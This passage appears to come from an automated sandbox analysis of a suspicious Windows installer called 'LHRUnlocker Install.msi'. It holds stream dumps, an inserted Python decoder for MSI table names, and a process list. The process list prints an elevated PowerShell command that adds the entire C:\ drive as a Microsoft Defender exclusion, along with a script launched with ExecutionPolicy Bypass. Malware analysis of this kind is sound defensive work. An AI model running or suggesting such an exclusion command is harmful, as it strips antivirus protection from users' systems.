                                  Data Raw:6b 01 d4 01 d6 01 dc 01 de 01 e0 01 e2 01 e4 01 e6 01 e8 01 ec 01 f5 01 ac 02 ad 02 ae 02 af 02 b0 02 b1 02 b2 02 b3 02 b4 02 b5 02 b6 02 b7 02 b8 02 b9 02 ba 02 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00
                                  General
                                  Stream Path:\x18496\x17165\x16949\x17894\x17778\x18492
                                  File Type:data
                                  Stream Size:30
                                  Entropy:3.44441382958
                                  Base64 Encoded:False
                                  Data ASCII:$ . O . . . . . . . . . . . $ . . . . . . . ' . . . . . . .
                                  Data Raw:24 00 4f 01 be 02 fd 02 14 04 fd 02 14 04 24 00 00 00 fd 02 16 04 27 00 17 04 13 04 15 04
                                  General
                                  Stream Path:\x18496\x17165\x17380\x17074
                                  File Type:data
                                  Stream Size:616
                                  Entropy:4.26905156607
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . S . ] . a . e . h . q . s . w . z . { . . . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . . . r . r . r . r . r . r . r . r . r . ( . r . r . r . . . r . r . r . r . r . r . r . r . r . r . r . r . . . i . . . . . . . . . . . . . . . . . . . G . . . . . . . U . . .
                                  Data Raw:9a 01 a4 02 a5 02 a8 02 a9 02 aa 02 ab 02 c5 02 dc 02 f4 02 f8 02 fc 02 0c 03 11 03 13 03 1b 03 30 03 53 03 5d 03 61 03 65 03 68 03 71 03 73 03 77 03 7a 03 7b 03 80 03 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80
                                  General
                                  Stream Path:\x18496\x17167\x16943
                                  File Type:data
                                  Stream Size:80
                                  Entropy:3.33010705294
                                  Base64 Encoded:False
                                  Data ASCII:& . ( . ) . * . & . ( . ) . * . & . . . ) . . . . & > . . . . . . . ) . . . / . . . . . . . . . U . . . U . U . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:26 00 28 00 29 00 2a 00 26 00 28 00 29 00 2a 00 26 00 a1 06 29 00 a2 06 00 26 3e 80 00 e8 0b 80 00 fa 29 80 00 e0 2f 80 a0 06 00 00 a0 06 a0 06 55 01 00 00 55 01 55 01 00 80 00 80 00 80 00 80 01 00 00 80 02 00 00 80 03 00 00 80 04 00 00 80
                                  General
                                  Stream Path:\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                  File Type:data
                                  Stream Size:510
                                  Entropy:5.8183181554
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . = . > . A . C . . . . . . . . . . . . . . . . . ! . $ . 1 . ; . > . A . B . G . N . Q . U . W . ] . b . e . h . j . q . t . w . y . | . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:09 00 0a 00 0e 00 0f 00 10 00 12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00 1a 00 3d 01 3e 01 41 01 43 01 ff 01 01 02 04 02 0f 02 15 02 1b 02 1d 02 1e 02 21 02 24 02 31 02 3b 02 3e 02 41 02 42 02 47 02 4e 02 51 02 55 02 57 02 5d 02 62 02 65 02 68 02 6a 02 71 02 74 02 77 02 79 02 7c 02 7e 02 81 02 83 02 85 02 87 02 8a 02 8c 02 8e 02 90 02 92 02 94 02 96 02 98 02 9b 02 9d 02 9f 02
                                  General
                                  Stream Path:\x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472
                                  File Type:data
                                  Stream Size:204
                                  Entropy:5.26148780813
                                  Base64 Encoded:False
                                  Data ASCII:. . . . = . > . A . C . A . B . N . . . . . . . . . . . . . . . h . q . { . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . e . d . . . . . . . . . L . . . . . . . . . K . . . . . . . . . . . 5 . 4 . c . . . . . . . f . 6 . 3 . . . . . . . . . . . . .
                                  Data Raw:09 00 0a 00 3d 01 3e 01 41 01 43 01 41 02 42 02 4e 02 a4 02 a7 02 a8 02 a9 02 aa 02 ab 02 f4 02 68 03 71 03 7b 03 d0 03 d2 03 d5 03 dd 03 e9 03 f1 03 f3 03 f6 03 f7 03 05 04 07 04 0c 04 0d 04 0e 04 0f 04 00 00 00 00 00 00 00 00 b8 06 ae 06 00 00 00 00 00 00 00 00 00 00 be 06 00 00 00 00 bf 06 97 03 9a 03 9b 03 95 03 00 00 00 00 00 00 c0 06 9b 03 a4 06 d6 03 00 00 00 00 a4 06 b9 06
                                  General
                                  Stream Path:\x18496\x17547\x17906\x17910\x16693\x17651\x17768\x15518\x16924\x17972\x17512\x16934
                                  File Type:data
                                  Stream Size:66
                                  Entropy:4.16389459119
                                  Base64 Encoded:False
                                  Data ASCII:= . > . @ . A . C . D . F . G . I . J . K . . . ? . ? . B . ? . E . E . H . H . E . L . . . . . , . T . ^ . . . . . X . . . . . .
                                  Data Raw:3d 01 3e 01 40 01 41 01 43 01 44 01 46 01 47 01 49 01 4a 01 4b 01 00 00 3f 01 3f 01 42 01 3f 01 45 01 45 01 48 01 48 01 45 01 4c 01 97 80 fa 80 2c 81 54 81 5e 81 90 81 c2 81 58 82 8a 82 bc 82 20 83
                                  General
                                  Stream Path:\x18496\x17548\x17648\x17522\x17512\x18487
                                  File Type:data
                                  Stream Size:84
                                  Entropy:3.15613264549
                                  Base64 Encoded:False
                                  Data ASCII:$ . % . & . ' . ( . ) . * . . . . . . . . . . . . . . . $ . $ . . . O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . & . . . ( . ) . * .
                                  Data Raw:24 00 25 00 26 00 27 00 28 00 29 00 2a 00 bf 02 c1 02 bd 02 c4 02 c2 02 c0 02 c3 02 24 00 24 00 be 02 4f 01 be 02 be 02 be 02 00 80 04 81 00 80 00 80 00 81 00 80 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 26 00 00 00 28 00 29 00 2a 00
                                  General
                                  Stream Path:\x18496\x17548\x17905\x17589\x15151\x17522\x17191\x17207\x17522
                                  File Type:data
                                  Stream Size:72
                                  Entropy:3.28528343517
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . C . E . G . I . O . P . . . # . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:a8 02 a8 02 a8 02 a8 02 a9 02 a9 02 1b 03 1b 03 1b 03 43 03 45 03 47 03 49 03 4f 03 50 03 cd 02 23 03 25 03 8e 03 8e 03 8e 03 8e 03 92 03 92 03 8e 03 8e 03 8e 03 91 03 91 03 90 03 90 03 93 03 93 03 8f 03 8f 03 8f 03
                                  General
                                  Stream Path:\x18496\x17548\x17905\x17589\x15279\x16953\x17905
                                  File Type:data
                                  Stream Size:1536
                                  Entropy:4.88533384289
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . S . S . S . ] . ] . ] . a . e . e . e . h . h . h . h . q . q . q . q . q . q . s . s . s . s . s . s . s . w . w . w . w . w . w . w . w . z . z . z . z . z . z . z . z . z . z . z . z . { . { . . .
                                  Data Raw:9a 01 9a 01 9a 01 9a 01 9a 01 9a 01 9a 01 a4 02 a5 02 a5 02 a5 02 a8 02 a8 02 a8 02 a8 02 a9 02 a9 02 a9 02 aa 02 ab 02 ab 02 c5 02 c5 02 c5 02 c5 02 c5 02 c5 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 f4 02 f4 02 f4 02 f8 02 fc 02 fc 02 fc 02 fc 02 fc 02 fc 02 0c 03 0c 03 0c 03 0c 03 0c 03 11 03 11 03
                                  General
                                  Stream Path:\x18496\x17548\x17905\x17589\x18479
                                  File Type:data
                                  Stream Size:7280
                                  Entropy:4.54500622406
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:9a 01 9a 01 9a 01 9a 01 9a 01 9a 01 9a 01 9a 01 9a 01 a4 02 a4 02 a4 02 a4 02 a4 02 a4 02 a4 02 a4 02 a4 02 a4 02 a4 02 a4 02 a5 02 a5 02 a5 02 a5 02 a5 02 a5 02 a5 02 a8 02 a8 02 a8 02 a8 02 a8 02 a8 02 a8 02 a8 02 a8 02 a8 02 a8 02 a9 02 a9 02 a9 02 a9 02 a9 02 a9 02 a9 02 a9 02 a9 02 a9 02 aa 02 aa 02 aa 02 aa 02 aa 02 aa 02 aa 02 aa 02 aa 02 ab 02 ab 02 ab 02 ab 02 ab 02 ab 02
                                  General
                                  Stream Path:\x18496\x17630\x17770\x16868\x18472
                                  File Type:data
                                  Stream Size:32
                                  Entropy:2.76201589562
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:8a 01 8a 01 85 01 9d 07 00 00 85 01 00 00 00 00 02 00 00 80 01 01 00 80 00 00 00 00 c0 06 9e 07
                                  General
                                  Stream Path:\x18496\x17740\x16680\x16951\x17551\x16879\x17768
                                  File Type:data
                                  Stream Size:8
                                  Entropy:2.15563906223
                                  Base64 Encoded:False
                                  Data ASCII:$ . O . $ . ' .
                                  Data Raw:24 00 4f 01 24 00 27 00
                                  General
                                  Stream Path:\x18496\x17742\x17589\x18485
                                  File Type:data
                                  Stream Size:2572
                                  Entropy:6.5134680762
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . M . . . . . . . . . . . . . . . . . . . . . . . . ! . " . # . $ . % . & . ' . ( . ) . * . + . , . - . . . / . 0 . 1 . 2 . 3 . 4 . 5 . 6 . 7 . 8 . y . z . { . | . } . ~ . . . . . . . . . . . . . . . . . A . B . C . D . E . F . G . H . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . m . n . o . p .
                                  Data Raw:00 80 01 80 02 80 03 80 04 80 05 80 06 80 07 80 08 80 09 80 0a 80 0b 80 0c 80 0d 80 0e 80 0f 80 10 80 11 80 12 80 13 80 14 80 15 80 16 80 17 80 20 80 21 80 e9 83 4d 84 15 85 16 85 17 85 18 85 19 85 1a 85 1b 85 1c 85 1d 85 1e 85 1f 85 20 85 21 85 22 85 23 85 24 85 25 85 26 85 27 85 28 85 29 85 2a 85 2b 85 2c 85 2d 85 2e 85 2f 85 30 85 31 85 32 85 33 85 34 85 35 85 36 85 37 85 38 85
                                  General
                                  Stream Path:\x18496\x17753\x17650\x17768\x18231
                                  File Type:PDP-11 separate I&D executable not stripped - version 1
                                  Stream Size:388
                                  Entropy:4.67624508089
                                  Base64 Encoded:False
                                  Data ASCII:. . % . R . T . V . X . Y . [ . ] . _ . a . b . d . f . h . j . l . m . o . p . r . s . t . u . w . x . z . | . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . U . W . Q . Z . \\ . ^ . ` . W . c . e . g . i . k . Q . n . W . q . Q . Q . Q . v . W . y . { . } . . . . . . .
                                  Data Raw:09 01 25 01 52 01 54 01 56 01 58 01 59 01 5b 01 5d 01 5f 01 61 01 62 01 64 01 66 01 68 01 6a 01 6c 01 6d 01 6f 01 70 01 72 01 73 01 74 01 75 01 77 01 78 01 7a 01 7c 01 7e 01 80 01 82 01 84 01 86 01 88 01 8b 01 8c 01 8f 01 90 01 91 01 93 01 94 01 96 01 97 01 99 01 9b 01 9d 01 9f 01 a1 01 a3 01 a5 01 a7 01 a9 01 ab 01 ad 01 af 01 b1 01 b3 01 b5 01 b7 01 b9 01 bb 01 bd 01 bf 01 c1 01
                                  General
                                  Stream Path:\x18496\x17932\x17910\x17458\x16778\x17207\x17522
                                  File Type:data
                                  Stream Size:480
                                  Entropy:4.17269583505
                                  Base64 Encoded:False
                                  Data ASCII:= . A . . . . . . . & . ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 . . . A . . . . . A . 3 . 3 . . . . . . . A . 3 . . . . . . . A . 3 . . . . . 3 . . . . . . . . . . . 3 . 3 . 3 . 3 . 3 . 3 . 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . Q .
                                  Data Raw:3d 01 41 01 04 02 12 02 1d 02 26 02 29 02 a6 02 b2 03 be 03 cd 03 d0 03 d2 03 d5 03 d8 03 dd 03 e0 03 e5 03 e7 03 e9 03 eb 03 ed 03 ef 03 f1 03 f3 03 f6 03 f7 03 f9 03 fb 03 fd 03 ff 03 01 04 03 04 05 04 07 04 0a 04 0c 04 0d 04 0e 04 0f 04 01 81 01 80 01 80 01 ac 01 80 01 ad 01 ac 33 80 01 80 41 80 01 8c 01 80 41 81 33 80 33 80 13 80 01 80 01 80 41 80 33 80 01 80 01 84 01 84 41 80
                                  General
                                  Stream Path:\x18496\x17998\x17512\x15799\x17636\x17203\x17073
                                  File Type:data
                                  Stream Size:128
                                  Entropy:4.21298288211
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . 9 . m . 9 . . . . . . . . . . . ! . # . % . % . * . , . 9 . . . 9 . m . 9 . . . . . . . . . . . . . . . . . . . . . . . _ . . . _ . _ . _ . . . . . . . . . . . . . . . _ . . . _ . _ .
                                  Data Raw:a4 02 a4 02 aa 02 aa 02 f8 02 f8 02 fc 02 11 03 1b 03 1b 03 1b 03 1b 03 1b 03 1b 03 1b 03 1b 03 39 00 f9 02 39 00 6d 03 39 00 f9 02 01 03 01 03 cb 01 1f 03 21 03 23 03 25 03 25 03 2a 03 2c 03 39 00 96 06 39 00 6d 03 39 00 96 06 98 06 98 06 99 06 99 06 99 06 9e 06 9d 06 9e 06 9c 06 9b 06 5f 00 97 06 5f 00 5f 00 5f 00 97 06 98 06 98 06 9a 06 9a 06 9a 06 9f 06 5f 00 9f 06 5f 00 5f 00
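The Stream Path values listed above are Windows Installer table names in the obfuscated form the OLE container stores them in, printed by the report as decimal UTF-16 code units (`\x18496` is 0x4840, the marker for a database table; 0x3800..0x47FF packs two characters of the 64-symbol alphabet `0-9A-Za-z._`, 0x4800..0x483F packs one). Decoding them is the quickest way to see which tables the package carries, and it also shows that the streams whose File Type reads "MIPSEB Ucode", "SysEx File -" and "PDP-11 separate I&D executable not stripped" are simply the Media, Registry and Property tables: a file-type guess on a short binary table stream carries no meaning. The decoder below is an added example, not part of the Joe Sandbox report; the stream paths and File Type labels embedded in it are copied from the entries above, and the `\xNNNNN` parsing assumes the report's decimal notation.

```python
import re

# 64-symbol alphabet of the Windows Installer stream-name encoding.
ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz._"
TABLE_MARKER = 0x4840                  # leading code unit: this stream is a database table
PAIR_LO, PAIR_HI = 0x3800, 0x47FF      # code units packing two characters
SINGLE_LO, SINGLE_HI = 0x4800, 0x483F  # code units packing one trailing character


def decode_msi_stream_name(units):
    """Decode the UTF-16 code units of an MSI stream name to (is_table, name)."""
    is_table = False
    chars = []
    for u in units:
        if u == TABLE_MARKER:
            is_table = True
        elif PAIR_LO <= u <= PAIR_HI:
            v = u - PAIR_LO
            chars.append(ALPHABET[v & 0x3F])  # low 6 bits: first character
            chars.append(ALPHABET[v >> 6])    # high 6 bits: second character
        elif SINGLE_LO <= u <= SINGLE_HI:
            chars.append(ALPHABET[u - SINGLE_LO])
        else:
            chars.append(chr(u))              # not encoded (e.g. cabinet streams)
    return is_table, "".join(chars)


# The report writes each code unit as "\x" followed by its DECIMAL value, so the
# paths must be handled as raw strings: in a normal Python literal "\x18496" would
# be the byte 0x18 followed by "496".
_TOKEN = re.compile(r"\\x(\d+)|(.)", re.DOTALL)


def parse_report_path(path):
    """Convert the report's "\\x18496\\x16191..." notation into a list of code units."""
    units = []
    for m in _TOKEN.finditer(path):
        if m.group(1) is not None:
            units.append(int(m.group(1), 10))
        else:
            units.append(ord(m.group(2)))   # literal character, kept as-is
    return units


def decode_report_path(path):
    """Report notation in, (is_table, name) out."""
    return decode_msi_stream_name(parse_report_path(path))


# Stream paths and File Type labels copied from the report entries above.
REPORT_STREAMS = [
    (r"\x18496\x16191\x17783\x17516\x15210\x17892\x18468", "data"),
    (r"\x18496\x16191\x17783\x17516\x15978\x17586\x18479", "data"),
    (r"\x18496\x16255\x16740\x16943\x18486", "data"),
    (r"\x18496\x16918\x17191\x18468", "MIPSEB Ucode"),
    (r"\x18496\x16923\x17194\x17910\x18229", "SysEx File -"),
    (r"\x18496\x17753\x17650\x17768\x18231",
     "PDP-11 separate I&D executable not stripped - version 1"),
    (r"\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934",
     "data"),
]


def decode_report_streams(entries=REPORT_STREAMS):
    """Return {decoded table name: reported File Type} for the given entries."""
    return {decode_report_path(path)[1]: ftype for path, ftype in entries}


if __name__ == "__main__":
    for name, ftype in decode_report_streams().items():
        print(f"{name:24} File Type in report: {ftype}")
```

Running the block lists `_StringData`, `_StringPool`, `_Tables`, `Media`, `Registry`, `Property` and `InstallExecuteSequence` for the seven entries embedded in it; the same function applied to the remaining paths above yields the rest of the table set (for example `Binary`, `CustomAction`-style sequence tables, `Component`, `Upgrade`, `Error`), which is what to compare against the actions the sandbox observed.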
                                  No network behavior found

                                  Target ID:0
                                  Start time:18:49:20
                                  Start date:23/02/2022
                                  Path:C:\Windows\System32\msiexec.exe
                                  Wow64 process (32bit):false
Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\LHRUnlocker Install.msi"
Imagebase:0x7ff6544f0000
File size:66048 bytes
MD5 hash:4767B71A318E201188A0D0A420C8B608
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:1
Start time:18:49:21
Start date:23/02/2022
Path:C:\Windows\System32\msiexec.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\msiexec.exe /V
Imagebase:0x7ff6544f0000
File size:66048 bytes
MD5 hash:4767B71A318E201188A0D0A420C8B608
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:3
Start time:18:49:22
Start date:23/02/2022
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding D930A47D56309F190C9E79168CF159A8 C
Imagebase:0x12e0000
File size:59904 bytes
MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:7
Start time:18:49:35
Start date:23/02/2022
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding EE2A3AF825C1BBEBB4FC2081145CDAF4
Imagebase:0x12e0000
File size:59904 bytes
MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:8
Start time:18:49:40
Start date:23/02/2022
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue."
Imagebase:0x900000
File size:430592 bytes
MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

Target ID:9
Start time:18:49:41
Start date:23/02/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:20
Start time:18:51:21
Start date:23/02/2022
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\
Imagebase:0x900000
File size:430592 bytes
MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

No disassembly